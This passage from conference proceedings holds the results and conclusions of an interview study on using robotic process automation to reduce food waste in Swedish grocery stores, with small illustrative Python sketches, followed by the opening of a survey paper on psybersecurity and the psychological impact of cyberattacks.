• Mungla [3] investigated RPA for inventory control and management for freight forwarders. This article does not present any application of RPA to food waste reduction.
However, the lessons learned about using RPA in inventory control and management could be applied to grocery stores, even though the nature of the products kept at grocery stores differs from that of general commodities.
• Finally, after we completed our study, we found that a new article [15] about the application of Artificial Intelligence (AI) to help reduce food wastage in grocery stores had been published in a conference publication channel of the Association for Information Systems. The focus of [15] is to use machine learning to predict the demand for food items so that production planning is optimized and food wastage is reduced. This article is interesting; however, future demand for food is not always determined by grocery store data alone and could be affected by several external factors. For example, the prediction for own-branded food production in [15] could be affected by surplus production and supply of similar food items by other companies, market competition, and other market disruptions.
3 Methodology
Denscombe [16] argues that a strategy is a plan of action designed to achieve a specific goal. This study aims to identify the advantages and disadvantages of using RPA technology in Swedish grocery stores to help reduce food wastage. To meet this aim, we conducted a survey, collecting qualitative data through semi-structured interviews about the use of RPA in Swedish grocery stores. We applied thematic analysis to identify the benefits and disadvantages of implementing RPA technology in grocery stores in Sweden.
According to [16], no research strategy is suitable for all kinds of research problems. Thus, [16] suggests that, to find the most suitable research strategy, the researcher should ask whether the strategy is suitable, feasible, and ethical. A survey enables researchers to seek valuable information from relevant respondents and to undertake empirical research by investigating a certain phenomenon in depth through close inspection [17]. An alternative research strategy is a case study. One of the strengths of the case study approach is that it allows the researcher to use various sources, data, and research methods. The case study approach is most suitable when the researcher wants to study an issue in more depth and explain the complexity and subtlety of problems in real-life situations [16]. We chose a survey instead of a case study because of time constraints, as case studies demand considerably more time. Besides, surveys are more suitable for understanding a carefully sampled population.
3.1 Methods for Data Collection
This study used semi-structured interviews as the data collection method. Denscombe [16] argues that an interview is a better choice than a questionnaire for gaining information about respondents’ experiences and personal opinions. We used purposive sampling to select six respondents who have experience working in grocery stores and who therefore already knew the subject of investigation, that is, the workflows of the grocery store.
We conducted the interviews by letting the respondents have enough time to give insight into their workflows and thoughts regarding the questions that were asked without getting sidetracked to a point where the individual interviews differed too much in time. Table 1 lists and describes the respondents that participated in this study. Most of the respondents work at the largest grocery stores in Sweden with approximately 92 million SEK in revenue.
Table 1. Description of respondents with anonymous representation of R1 to R6
Respondent alias | Role | Interview date
R1 | Front-office and check out | 01-06-2021
R2 | Fresh products department | 07-06-2021
R3 | Front-office and check out | 11-06-2021
R4 | Fruit department | 24-06-2021
R5 | Front office and sales | 30-06-2021
R6 | Front office and check out | 17-07-2021
3.2 Thematic Analysis
Thematic analysis is suitable for qualitative data analysis; it involves identifying, analyzing, and interpreting thematic patterns within the collected data [18]. We used thematic analysis for generating codes and identifying themes, following the six steps described by [18]:
Step 1: Familiarizing with Data: We transcribed the collected audio interview data, read and re-read the transcripts, and noted down initial ideas.
Step 2: Generating Initial Codes: As the investigation aims to find the pros and cons of using RPA in grocery stores, the codes are based on pre-identified themes. Thus, the thematic analysis follows a deductive approach. We systematically coded interesting features of the data across the entire data set and then collated the data relevant to each code by highlighting it with a color code, as illustrated in Figs. 4 and 6.
Step 3: Searching for Themes: After generating initial codes in the previous step, we collated the codes into potential themes.
Step 4: Reviewing Themes: This step includes checking whether the themes relate to the coded extracts (see Figs. 4 and 6) and to the entire dataset, and generating a thematic map of the analysis, as illustrated in Fig. 3.
Step 5: Defining and Naming Themes: This step refers to ongoing analysis to refine the specifics of each theme and the overall story the analysis tells, and to write clear definitions and names for each theme. In this step, the final thematic map is created, as illustrated in Fig. 5.
Step 6: Producing the Report: This is the final step of the analysis. It involves selecting explicit, clear extract examples, conducting the final analysis of the selected extracts, relating the analysis back to the research question and the literature, and producing a scholarly report of the analysis.
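The collation in Steps 2 and 3 can be illustrated with a minimal sketch. It assumes a deductive setup with two predefined themes (pros and cons) and represents each coded extract as a (respondent, theme, code) tuple. The function names and the short code labels are hypothetical and only paraphrase a few of the entries reported in Table 2; the study itself describes color-coded highlighting done by hand, not a script.

```python
from collections import defaultdict

# Predefined top-level themes for the deductive approach (pros and cons of RPA).
THEMES = ("pros", "cons")

# Illustrative coded extracts: (respondent, theme, code).
# The labels are shortened paraphrases of entries in Table 2, not original data.
coded_extracts = [
    ("R1", "pros", "less stress"),
    ("R1", "pros", "simpler price changes"),
    ("R2", "pros", "simpler price changes"),
    ("R3", "pros", "faster expiry-date checks"),
    ("R3", "cons", "fear of replacement"),
    ("R6", "cons", "fear of replacement"),
    ("R4", "cons", "data faults and theft"),
]


def collate(extracts):
    """Group respondents by code within each predefined theme."""
    themes = {theme: defaultdict(set) for theme in THEMES}
    for respondent, theme, code in extracts:
        if theme not in themes:
            raise ValueError(f"unknown theme: {theme}")
        themes[theme][code].add(respondent)
    return themes


def summarize(themes):
    """Return (theme, code, respondents) rows, most-supported codes first."""
    rows = []
    for theme in THEMES:
        by_code = themes[theme]
        # Sort by descending number of respondents, then alphabetically.
        for code in sorted(by_code, key=lambda c: (-len(by_code[c]), c)):
            rows.append((theme, code, sorted(by_code[code])))
    return rows


if __name__ == "__main__":
    for theme, code, respondents in summarize(collate(coded_extracts)):
        print(f"{theme:4} | {code:26} | {', '.join(respondents)}")
```

Keeping the respondent alias attached to every code makes it straightforward to report which respondents support each pro or con, which is the form the results take in Table 2.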
Fig. 3. Initial map of thematic themes
The initial thematic map remained roughly identical throughout the analysis. However, initial themes were either too vague or unnecessarily separated, creating redundancy. The Work theme became bloated with too many sub-themes, and the Pros
and Cons themes included RPA as a sub-theme. The thematic map was enhanced by introducing themes such as “Work tasks,” “RPA,” and “Current issues with tasks”.
Fig. 4. Snapshot of extracted data and initial themes added to the code
Fig. 5. Developed map of thematic maps
The final thematic map consists of four main themes, each with two sub-themes; see Fig. 5. The four themes are discussed below:
• Work - this theme is important, and it yielded interesting work-related information. Our extracted information indicates that food expiration depends on the type of food items each department manages. The expiration of dairy products is different from that of other food types.
• RPA - contains two sub-themes, namely pros and cons. This theme directly relates to the research goal, as our task is to identify the advantages and challenges of adopting RPA in grocery stores.
• Work tasks - contains two sub-themes: food wastage and the current system. Food wastage is about how employees manage food waste. The current system sub-theme enabled us to capture information regarding current automation for dealing with food wastage.
• Current systems - has two sub-themes, namely monotonous tasks and other tasks. This theme was created to capture information regarding repetitive tasks and how they are dealt with.
Fig. 6. Snapshot of code from respondents segregated by color and placed in a table containing the relevant themes
3.3 Evaluation Methods
We evaluated our thematic analysis and the results following the evaluation guidelines and steps explained by [19]. The evaluation checklist includes:
• Justified thematic analysis - this includes examining the consistency of the thematic analysis with the research questions and with the theoretical and conceptual underpinnings of the research.
• Clear specific approach - we applied deductive thematic analysis, where our initial major themes are predefined to reflect the research objectives. We use cons to mean challenges and pros to mean advantages.
• Evidence of problematic assumptions - we did not find any problematic assumptions.
• Theoretical underpinning - we do not have theoretical underpinnings affecting the thematic analysis specified.
• Own the perspective - to identify if the researchers own their perspective. We mainly focused on identifying the advantages and challenges of adopting RPA in grocery stores and did not bring our own assumptions.
• Analytic procedures - identify if procedures are analytic and clearly outlined.
• Evidence of conceptual confusion - identify if there is any conceptual and procedural confusion. We did not encounter any theoretical confusion.
The next steps from [18] are about evaluating the analysis, findings, and results. These steps are:
• Clear themes - we used thematic maps, tables, and narrative descriptions to give an overview of the thematic analysis.
• Domain summaries - we used the collected data to create summaries of themes, evaluated the thematic analysis, and proposed future research directions.
• Contextualizing information presented as a theme - check if non-thematic contextualizing information is presented as a theme. We presented quotations of respondents’ words to make sure all non-thematic information is captured.
• Actionable outcome - in applied research, see if the reported themes give rise to actionable outcomes.
• Conceptual clashes - check whether there are conceptual clashes and evidence of conceptual confusion in the paper.
• Unconvincing analysis - the final step is to analyze if there is evidence of weak or unconvincing analysis.
4 Results and Analysis
The majority of the participants in this study had a favorable view of implementing RPA in their workflow. Small-scale automation already exists in their current business processes. However, they are skeptical about how much automation could be used in these enterprises in the future and whether employees would still be needed in the same way as they are today. In this section, the advantages and challenges of adopting RPA are presented.
4.1 Advantages and Challenges of Adopting RPA
The advantages and challenges, referred to in this paper as pros and cons, are presented below. Several advantages and points of skepticism were identified. The skepticism and additional thoughts from the respondents are discussed in more depth in the following subsections. Table 2 briefly describes the pros and cons of RPA according to the respondents that participated in this study.
Table 2. Identified pros and cons (advantages and challenges) of adopting RPA
Pros with RPA
1. More time for focusing on productivity (R1, R2, R3, R6), such as sales (R2); enables employees to achieve productive work (R2)
2. Less stress for employees, which creates a healthy work environment (R1)
3. Simplifies tasks for changing prices (R1, R2)
4. Cheap and easy to implement (R2)
5. Reduces the time it takes to check the date of expiry (R3)
6. Manages the workflow better (R4)
7. Enables stores to keep healthy food and creates more time to make the store look better (R3)
8. Decreases the number of monotonous tasks (R5)
Cons with RPA
1. Human intervention is needed because RPAs are not yet developed into full AI solutions (R1, R2)
2. It costs to recruit an RPA specialist (R3)
3. Employees fear adopting it because they fear replacement (R3, R6)
4. RPAs could be affected by faults in data entry, cash register problems, and theft (R4). Theft is not automatically registered, as employees do not know what is missing. Thus, counting and removal of damaged items should be done manually
5. Companies do not fully trust RPAs. For example, R5 claims that RPAs should be developed well before they are used
6. It demands that people learn how to use them (R6)
7. Not all tasks are automated. Thus, identifying automated tasks and those needing human intervention requires an understanding of the workflows and the system itself (R2)
8. The balance between automated and manual tasks must be optimized (R2)
4.2 Advantages of Adopting RPA
All respondents have a favorable view of using RPA in the organization, yet two have fears, as explained in the next section. The majority agreed that adopting RPA would give them a less stressful work environment, as RPA takes over monotonous tasks and they can focus on productive work. With better physical and mental health among employees, an organization works more efficiently and fewer employees report sick [20]. According to the respondents, monotonous tasks harm employees’ health because they cause stress while employees are also helping customers and managing several other tasks.
“I believe that when you work in a grocery store, you should probably expect most things to be monotonous. But then I think there are monotonous tasks that can prevent us from providing even better service to customers. Every day is different and usually all routines are done step by step during the day, in parallel with helping customers. We spend too much time on things around us which means we usually do not get a good flow when we at the same time have to help customers. We rarely have time to focus on new things as well.” - R2.
According to one respondent (R2), implementing RPA is easy and cheap. Thus, we believe that, despite their skepticism, grocery stores should try it. One of the respondents works for a company that has almost 1300 stores in Sweden, with approximately 92 million SEK in revenue.
“We are looking at comparing numbers from the previous year all the time and buy goods in a quantity based on that. That is something a system could handle, at least if it is goods stored in a central warehouse by [the enterprise] itself or large external suppliers like Scan. And since it does not seem to be so expensive and difficult to fix, I think [the company] would be interested in testing it or at least look at it more.” - R2.
Most respondents commented that adopting RPA in grocery stores would help reduce food wastage. A positive opinion about adopting technology contributes to successful implementation. For example, [21] argues that having staff who entertain disruption or introduce new technology is an indication that small and medium-sized enterprises will succeed.
4.3 Challenges of Adopting RPA
Despite the advantage of RPA in taking over monotonous tasks, employees fear losing their jobs to the digital workforce.
“The drawbacks with RPA could be the price and cost. I do not know how much it would cost for the grocery store to implement it. It could be at the cost of the workforce meaning it could take over the employees. And if working behind the cash register would be the only task left, it could also be automated with self scanning registers and such.” - R3.
“I think while automation can be good and really effective, it can also affect the working community. There could be fewer jobs I think. It will not always be perfect for all systems so you will still need system developers and people who will handle it. But if you do not have the knowledge of how much things can be improved with automation, you probably have an even stronger opinion than mine that there will be fewer jobs in the future because of it.” - R6.
Automation can be affected by deviations due to system errors, theft, and cash register problems.
“I think automation could facilitate the business but if any deviation occurs one day, a person could change the approach based on a specific problem. Not a system. That is the negative part about it.” - R1.
“The system could be affected by certain things such as theft, cash register issues, and inputting the wrong values in the system. It is rare that our system is completely correct, above all, I do not believe there is an item that is the exact correct number in quantity in the store that the system says there is.
There are too many factors that make the system give wrong information but in the bigger picture it facilitates the workflow.” - R4. Expiry date processing is tricky for certain types of foods, such as fruits and vegetables. For example, the expiry dates of such food types are affected by storage, transportation, climatic variations, and handling conditions that affect the shelf life of fruits and vegetables. “I think it is a great solution that most likely would be beneficial if it was added to our current systems since it would aid the workers by reducing simple and redundant tasks that involve a computer system. But I think the solution is not developed enough to handle situations that a computer might not be able to handle. In the fruit department, the goods can have different qualities based on their placement in the store, such as the storage space or in the store at the front. Fruits are time sensitive and if they are shipped to our store with the same delivery they could still be delivered at different times from the producer. That means the fruit could arrive in different qualities that only a human can handle. That is at least how it looks today.” - R5. “It is definitely the fruit department that is at the top of the amount of wastage in our store. Then we usually compare it with other stores. For example, another store has
a much better cold storage, then the fruit lasts longer compared to ours. But absolutely, the fruit department has a lot of waste but there are also good margins. The fruit is usually called the war treasury because we make the most money from it.” - R4.
4.4 Possibilities of Implementing RPA in Current Business Processes
Respondents unanimously expressed that food wastage is a serious problem that grocery stores currently face. For example, one respondent reported that their store loses about 30,000 SEK per month due to food wastage.
“I would say that a normal month of food wastage is around SEK 30,000. And now during the summer, even more gets thrown away because the weather is so hot. The problem with our store is that they do not count on the purchase price from the supplier. Since they want to scare us, they count the price of food wastage for which we sell the product.” - R4.
The solution proposed to reduce the costs that companies incur due to food wastage is lowering the price of items close to expiration. Checking the expiry date is done manually by employees. Information regarding expiry dates is found in the company’s information systems, but information regarding the current state of the food items requires physical inspection and manual updating. RPA soft bots could be used in the workflow to expedite expiry date checking, automatically track the time, and set prices.
“One business process that I think RPA can be used in is when we receive the deliveries of goods. The different kinds of goods are separated in gray plastic crates with their own sticker on them, which shows the name of the product, expiration date and its barcode. We scan the barcodes when the delivery arrives and then the product is entered into the system. We base the price and number of goods that come with the delivery on previous sales figures and the margin on the obtained price from the supplier of the goods versus the sales price to our customers. You could certainly link RPA to it because each item comes with an expiration date and then the date of arrival of the delivery is also logged. Afterwards, the robot will be able to sense it and set a timer, and count the number of goods sold on that batch and lower the price close to the expiration date if needed. Then maybe it can also give us a notification with information of which goods need new price tags” - R2.
Another interesting way of reducing food wastage is using near-expiry food for charity. One respondent’s grocery store donates near-expiry food to the homeless. This is not specific to RPA and automation; however, it is still worth mentioning, as the company is contributing to the environment.
“We have grilled sausages and stuff. We throw these away at the end of the day and when they start to look bad. Then we also have buns and bread and things that we bake in the morning and toss at the end of the day. These are difficult goods to handle because you want a set of these goods available to sell all the time and it is difficult to calculate exactly how much we should bake or cook.” - R3.
“In the pre-store we usually don’t have specific routines for date checking goods. We make sure that the ones with lower expiration dates are placed at the front so they are bought first. I know that those out on the floor lower the price and sell it for a lower
price in a special cooler. Unless the amount of goods is large enough to just keep them where they are usually placed in the store and put the discount price tag there.” - R1.
“We date check goods manually and use red stickers with a discount price that we put over the regular price sticker of the goods that are about to expire.” - R6.
“The bread department has a routine for food waste. We have a guy who usually comes and gathers bread in the morning. Instead of wasting it, I think he picks it up to give to the homeless. It’s nothing old and moldy really, but bread we simply cannot sell.” - R6.
“The thing that I think is good about the bread is that instead of throwing away food that should actually be thrown away, we could be giving it out so people can take advantage of it, which I think is great. Actually, the company will lose out on that economically, but there are so many others who benefit from it. In that way, it gives us a good reputation and an opportunity to use food waste for something good.” - R6.
Most respondents explained that the date of expiry is checked manually by reading the dates on the goods themselves on the shelves. Respondents R1 and R6 use new price stickers for nearly expired goods to sell them more quickly. It is also interesting to find out that the companies are willing to intervene and handle environmental and economic issues. Managing food wastage is a problem for fresh and unpacked foods, such as fruit and vegetables, because of external factors such as weather, storage conditions, and transportation.
4.5 The Necessity of Physical Work in Certain Monotonous Tasks
Grocery stores are characterized by monotonous tasks such as replenishing items on the shelf, which could take an entire workday, or even days. RPA can help reduce food wastage by sending information regarding expiring items to the deciding body for price reduction. For example, one of the respondents said that automation could be included in a workflow if the solution could send out information about items that need removal or price reduction.
“It would be easier [with automation], if you could get any notification in some way on the checkout screen saying something like “today these products are expiring, check them out”. Then you do not have to look at all the goods in the entire store to know which goods need to be thrown away. This partly helps the staff, and the store will also look fresher because then the customers do not have to look at the dates on the goods either.” - R3.
“Even if [RPA] sometimes will have problems, it will still help us in the end. If it works like it should it would be great. But I think it requires further developments before you could fully trust it. It would however still be helpful in the meantime.” - R5.
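The rule-based routine that R2 and R3 describe (log each batch with its expiry date at delivery, count what has been sold, and notify staff which goods need a new price tag or removal) can be sketched as follows. This is a minimal illustration under stated assumptions, not an implementation from the study: the `Batch` record, the `daily_check` function, the two-day discount window, and the 30% discount rate are all hypothetical, and the sketch covers only packed goods with a printed expiry date, since the respondents point out that fruit and vegetables still need human judgment.

```python
from dataclasses import dataclass
from datetime import date


@dataclass
class Batch:
    product: str
    expiry: date      # read from the crate sticker when the delivery is scanned
    price: float      # regular shelf price in SEK
    received: int     # units scanned in at delivery
    sold: int = 0     # units sold from this batch so far

    @property
    def remaining(self) -> int:
        return self.received - self.sold


# Hypothetical policy values; the paper does not specify any.
DISCOUNT_WINDOW_DAYS = 2
DISCOUNT_RATE = 0.30


def daily_check(batches, today):
    """Return one (product, action, new_price) notice per batch needing attention."""
    notices = []
    for batch in batches:
        if batch.remaining <= 0:
            continue  # nothing left on the shelf, nothing to do
        days_left = (batch.expiry - today).days
        if days_left < 0:
            notices.append((batch.product, "remove", None))
        elif days_left <= DISCOUNT_WINDOW_DAYS:
            new_price = round(batch.price * (1 - DISCOUNT_RATE), 2)
            notices.append((batch.product, "new price tag", new_price))
    return notices


if __name__ == "__main__":
    stock = [
        Batch("milk", date(2021, 6, 10), 12.0, received=40, sold=25),
        Batch("yogurt", date(2021, 6, 20), 20.0, received=30),
        Batch("cream", date(2021, 6, 8), 25.0, received=10, sold=2),
        Batch("butter", date(2021, 6, 9), 40.0, received=5, sold=5),
    ]
    for notice in daily_check(stock, today=date(2021, 6, 9)):
        print(notice)
```

The sketch only produces notices; attaching the new price sticker and removing expired goods remain manual steps, which is consistent with the respondents' view that human intervention is still needed.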
5 Discussions and Conclusions
This study aimed to identify the advantages and disadvantages of implementing RPA technology to improve the workflows in grocery stores and help them reduce food wastage. We collected data using semi-structured interviews and applied thematic analysis to answer the research question. We identified a list of advantages and challenges of adopting RPA in grocery stores, as presented in Sect. 4, and a summary of the result is presented in this section in comparison with the identified existing literature.
5.1 Identified Advantages of Adopting RPA
The identified advantages of adopting RPA in grocery stores fall into two categories: advantages to the employees and advantages to grocery stores. Employees will have more time to focus on creativity as RPA takes over tedious and repetitive tasks. Also, employees will have a better work environment with less stress, while RPA does monotonous and daunting tasks. Similarly, [8] states that RPA does the repetitive tasks that employees perform. According to [3], the major advantages of adopting RPA in organizations are cost reduction, speed of process execution, productivity, accuracy, compliance, flexibility, scalability, and removal of non-value-adding processes. The identified advantages of adopting RPA to reduce food wastage are as follows: it is relatively cheap and easy for grocery stores to adopt RPA; RPA can check the expiry dates of packed foods with better speed and accuracy; a grocery store will have healthy and fresh food in stock; RPA improves the process of setting new prices for packed food whose expiry dates are approaching; and, finally, RPA improves workflows so that employees can focus on value-generating processes such as sales.
5.2 Identified Challenges of Adopting RPA
In this section, we present the identified challenges of adopting RPA from the perspectives of grocery stores and their employees. Employees fear losing their jobs if RPA is adopted to automate workflows. Human intervention is needed in most workflows, so employees need training, or grocery stores may need to hire experts. Similarly, [3] reported that employees fear losing their jobs to soft robots, as robots perform faster and more consistently.
Also, RPA is not suitable for a highly complex process, as it incurs higher automation costs [14]. The challenge that grocery stores face if they adopt RPA to reduce food wastage is that human intervention is required in most workflows. Thus, grocery stores may be required to train their staff or even hire new technically skilled employees. According to the respondents, the other challenge is that RPA is a relatively new technology. Thus, grocery stores do not fully trust it; RPA is not fully developed, and managers of grocery stores could lose confidence. Identifying and prioritizing the workflows and tasks to be automated is not easy, and the balance between automated and manual tasks needs optimization. RPA is affected by erroneous data entry, cash register problems, and theft. So, RPA could mishandle erroneous data, while a human could quickly identify it.
The challenges identified in the literature are that RPA is not suitable for complex automation, as it may incur higher costs. For example, [14] recommends that 30% of the job should be done by human interaction while 70% is automated for the productive implementation of RPA. Employees fear losing their jobs to robots, as robots perform the process faster and more consistently [3]. RPA is not a cognitive solution for computer-driven processes [12]. RPA cannot learn from experience and is only used to mimic how a human would perform the task in a usual routine fashion [12].
5.3 Limitations
Our study focuses on Swedish grocery stores based in Stockholm. Even though the study location is limited to one city, we believe that the results of this study are more or less generalizable to Swedish grocery stores. Besides, we used purposive sampling to select knowledgeable respondents, as [16] suggested. However, the results of this study could be far from generalizable to other European and non-European cities. The transferability of research is about applicability, generalizability, and external validity [22]. Also, Ruona [23] states that external validity is related to the generalizability of the result to real-world problems and settings. The result of this study is limited in terms of transferability. For example, this study is limited to Swedish grocery stores. Thus, the results are far from applying to other types of organizations.
5.4 Concluding Remarks and Future Directions
We investigated the implications of adopting RPA technology to help grocery stores in Sweden reduce monotonous tasks, reduce food wastage, and streamline their workflow. Doguc [7] distinguishes between RPA and Business Process Management (BPM): BPM orchestrates operational business processes to expedite efficient workflows by integrating data, systems, and users, while RPA carries out tasks as employees would, but in record time. However, BPM and RPA do not conflict, even though both are designed to optimize processes [7]. Our result indicates that grocery stores could be reluctant to adopt RPA because they are unsure whether RPA is fully developed.
The fear of adopting RPA could be attributed to the perception among employees and grocery stores that RPA may be costly and may disrupt their business processes and business process management. RPA tools are relatively new software applications that mostly automate repetitive, rule-based tasks, and we suggest advocating best practices for their adoption. Mungla [3] suggests six best practices for adopting RPA: prioritizing the best-suited RPA use cases, determining return on investment expectations, defining governance structures, selecting the best RPA tool available, re-engineering processes to maximize the benefits of using RPA, and enabling profound collaboration between IT and the business. Our results indicate that one of the challenges of adopting RPA, particularly for reducing food wastage in grocery stores, is identifying and optimizing the tasks to automate. Similarly, [13] concluded from an analysis of case studies conducted on different types of businesses that companies must continuously monitor their workflows or processes to identify and optimize suitable processes or tasks for RPA, as not all kinds of processes can be automated. Besides, [14] claims that 70% of the tasks should be automated while 30% should involve human interaction. Therefore, future studies could include identifying workflow tasks for automation and manual work for best performance in grocery stores
Robotic Process Automation for Reducing Food Wastage
to support food waste reduction and optimize RPA usage for grocery stores. For example, future studies may include identifying relevant processes or tasks to be automated and optimization strategies for grocery stores. Finally, we learned that discussing the automation of monotonous tasks could evoke emotions such as skepticism from employees who are not familiar with the subject and only have a general knowledge of automation. This made it easier to be more nuanced when debating whether RPA is worth testing in the supply chain. We believe that RPA should be introduced to grocery stores and other types of companies to increase their revenues while decreasing costs. Two of the respondents expressed fear, and one expressed hesitancy, about adopting RPA even though they want to try it. Yet, the advantages of adopting RPA outweigh the disadvantages. For example, companies will have increased revenues, as reduced food wastage lowers their costs. Improved workflows, increased revenue, increased scalability, decreased stress on employees, increased employee productivity, fewer monotonous manual tasks, and an improved work environment are the most significant advantages of adopting RPA in a grocery store.
References

1. Naturvårdsverket: Etappmål för förebyggande av avfall (2020). http://www.naturvardsverket.se/upload/miljoarbete-i-samhallet/miljoarbete-i-sverige/regeringsuppdrag/2020/redovisning-ru-etappmal-forebyggande-avfall.pdf. Accessed 17 May 2021
2. Mullick, S., Raassens, N., Haans, H., Nijssen, E.J.: Reducing food waste through digital platforms: a quantification of cross-side network effects. Ind. Mark. Manage. 93, 533–544 (2021)
3. Mungla, B.O.: Robotic process automation for inventory control and management: a case of Freight Forwarders Solutions (Doctoral dissertation, Strathmore University) (2019)
4. Booker, Q., Munmun, M.: Industry RPA demands and potential impacts for MIS and related higher education programs (2022)
5. Annosi, M.C., Brunetta, F., Bimbo, F., Kostoula, M.: Digitalization within food supply chains to prevent food waste. In: Drivers, Barriers and Collaboration Practices, vol. 93, pp. 208–220. Industrial Marketing Management (2021)
6. E-Fatima, K., Khandan, R., Hosseinian-Far, A., Sarwar, D., Ahmed, H.F.: Adoption and influence of robotic process automation in beef supply chains. Logistics 6(3), 48 (2022)
7. Doguc, O.: Robot process automation (RPA) and its future. In: Research Anthology on Cross-Disciplinary Designs and Applications of Automation, pp. 35–58. IGI Global (2022)
8. Hofmann, P., Samp, C., Urbach, N.: Robotic process automation. Electron. Mark. 30(1), 99–106 (2019). https://doi.org/10.1007/s12525-019-00365-8
9. McAbee, J.: How to Use Data to Drive Automation and Remove Repetitive Tasks (2020). https://www.wrike.com/blog/data-drive-automation-remove-repetition/. Accessed 05 June 2021
10. Hitomi, K.: Automation - its concept and a short history. Technovation 14(2), 121–128 (1994)
11. Tripathi, A.M.: Learning Robotic Process Automation: Create Software Robots and Automate Business Processes with the Leading RPA tool–UiPath. Packt Publishing Ltd., Birmingham (2018)
12. Gami, M., Jetly, P., Mehta, N., Patil, S.: Robotic process automation–future of business organizations: a review. In: 2nd International Conference on Advances in Science & Technology (ICAST) (2019)
13. Osman, C.C.: Robotic process automation: lessons learned from case studies. Informatica Economica 23(4), 1–10 (2019)
14. Lamberton, C., Brigo, D., Hoy, D.: Impact of robotics, RPA and AI on the insurance industry: challenges and opportunities. J. Finan. Perspect. 4(1), 1–13 (2017)
15. Nascimento, A.M., Queiroz, A., de Melo, V.V., Meirelles, F.S.: Applying artificial intelligence to reduce food waste in small grocery stores (2022)
16. Denscombe, M.: The Good Research Guide for Small Scale Research Projects, 4th edn. Open University Press, Buckingham (2010)
17. Denscombe, M.: The Good Research Guide: For Small-Scale Social Research Projects, 5th edn. Open University Press, London (2014)
18. Braun, V., Clarke, V.: Using thematic analysis in psychology. Qual. Res. Psychol. 3(2), 77–101 (2006)
19. Braun, V., Clarke, V.: Evaluating and reviewing TA research: A checklist for editors and reviewers. The University of Auckland, Auckland (2017)
20. CDC Centers for Disease Control and Prevention: Workplace Health Model; Increase Productivity (2015). https://www.cdc.gov/workplacehealthpromotion/model/control-costs/benefits/productivity.html. Accessed 30 Aug 2021
21. Teunissen, T.: Success factors for RPA application in small and medium sized enterprises (Bachelor’s thesis, University of Twente) (2019)
22. Guba, E.G.: Criteria for assessing the trustworthiness of naturalistic inquiries. Educ. Tech. Res. Dev. 29(2), 75–91 (1981)
23. Ruona, W.E.: Analyzing qualitative data. Res. Organ. Found. Methods Inq. 223(263), 233–263 (2005)
A Survey Study of Psybersecurity: An Emerging Topic and Research Area
Ankur Chattopadhyay and Nahom Beyene
Northern Kentucky University, Highland Heights, KY 41076, USA [email protected]
Abstract. When studying cybersecurity, the emphasis is generally placed on protecting personal information and safeguarding the technology on which that information is stored. Cybersecurity attacks, which can occur in multiple forms, can seriously affect the involved stakeholders mentally, and this aspect of their impact tends to be underestimated. With the human mind being a significant attack target, psybersecurity has begun gaining prominence as an important field of study. In this survey paper, we explore psybersecurity as an emerging interdisciplinary area within the human security domain of cybersecurity and conduct a detailed study of its causes and effects. We discuss existing research work relevant to the field of psybersecurity and present an organization of the surveyed literature, which is classified into three notable categories. With psychiatric engineering gaining prominence as a new impactful attack vector, a psybersecurity attack (PSA) primarily targets the human mind. We study the relations between cybersecurity and cyberpsychology, as well as between psychiatric engineering (PE) and social engineering (SE), from an interdisciplinary perspective. We perform a unique analysis of both PE and SE as PSA, linking them to Cialdini’s six principles and their associated elements as causes for PSA. We then show how to connect these causal components of PSA to the eight cyberpsychology dimensions through a tabular map that we have developed. We also discuss the emergence of COVID-driven PSA with a focus on the psybersecurity of online healthcare information (OHI) users, including potential ways of protecting OHI users from the increase in psybersecurity threats. We conclude this survey study by looking at the potential scope of future work in psybersecurity, including new research directions, open problems, and research questions.
Keywords: Cybersecurity · Psybersecurity · Attacks · Cialdini’s principles · Cyberpsychology · COVID · Survey study · Emerging
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 893–912, 2023. https://doi.org/10.1007/978-3-031-28073-3_59

1 Introduction, Scope and Motivation

With the rise of technology in every facet of daily life, increased convenience comes with multiple security risks. When imagining cybersecurity, the focus is traditionally on protecting personal information and guarding the technology that contains this information. However, cyber-attacks, which can come in various forms, can target things beyond the obvious and can cause damage to the mental health of the victims, in addition to hacking the victim’s data, systems and technologies. Psybersecurity refers to the subject of securing mental well-being. It includes the study of best practices for balancing the preservation and protection of the mind’s health, as well as the study of the psychiatric consequences of technology usage combined with the effects it has on human security [1, 11, 40–43]. Psybersecurity attacks (PSA) can impact the mental health of victims by changing their mental setup, including mood, emotion, and behavior. Given that the target in PSA is primarily the human mind, their impact is quite significant. Psybersecurity is an emerging topic within the domain of human security. It has plenty of scope for future work, as not much research has been performed in this area [1, 11, 40].

In this paper, we perform a survey study of existing literature related to the interdisciplinary area of psybersecurity. We study different relevant publications and classify them into three notable categories, as shown in Fig. 1, which summarizes a noteworthy contribution of our survey study. Figure 1 is discussed in detail in Sect. 5 of this paper. Moreover, this research study analyzes both psychiatric engineering (PE) [1, 41–43] and social engineering (SE) [6, 12, 29] as PSA, linking them to Cialdini’s principles of persuasion (or influence) [3–5] and their associated causal elements. We then show how these causal components of PSA are connected to the cyberpsychology dimensions [10]. This analysis is shown in Fig. 2, which represents another notable contribution of our study. Figure 2 is discussed in detail in Sect. 6 of this paper. These two highlighted results (Figs. 1 and 2) are meant to be meaningful references for the community, including individuals who are interested in learning about psybersecurity and researchers who are working in this area or who wish to study the related scholarly works in this field. They represent unique, original contributions from our study, which leads to a multi-layered survey of psybersecurity involving important literature on this subject area and other related topics.

In summary, this survey study addresses the following research questions:
Research Question 1: What are the relevant published works on and around the topic of psybersecurity?
Research Question 2: How can the psybersecurity-related literature be classified using meaningful categories?
Research Question 3: What are the causal elements of psybersecurity attacks (PSA)?
Research Question 4: How are the causal components of psybersecurity attacks (PSA) connected to Cialdini’s principles of influence?
Research Question 5: How are the causal components of psybersecurity attacks (PSA) related to the architectural dimensions of cyberpsychology?
Research Question 6: What is the relationship between cybersecurity and psychology?
Research Question 7: What is the relationship between psychiatric engineering (PE) and social engineering (SE)?
Research Question 8: What are the impacts of psybersecurity attacks (PSA)?
Research Question 9: What are the prospective open research questions and potential future directions of work in the emerging, interdisciplinary field of psybersecurity?

In this paper, we also explore the relationship and connections between cybersecurity and psychology, as illustrated in Table 1. Additionally, we explore the
Fig. 1. This is a summarized diagram of the publications we surveyed along with the three classification categories used. The numerical figure within parentheses against each category stands for the number of publications surveyed in that category
Fig. 2. This summarizes our analysis of PSA using PE and SE, linking PSA to Cialdini’s principles of influence [3–5] and their causal components, and thereby connecting PSA to the eight cyberpsychology dimensions [10]
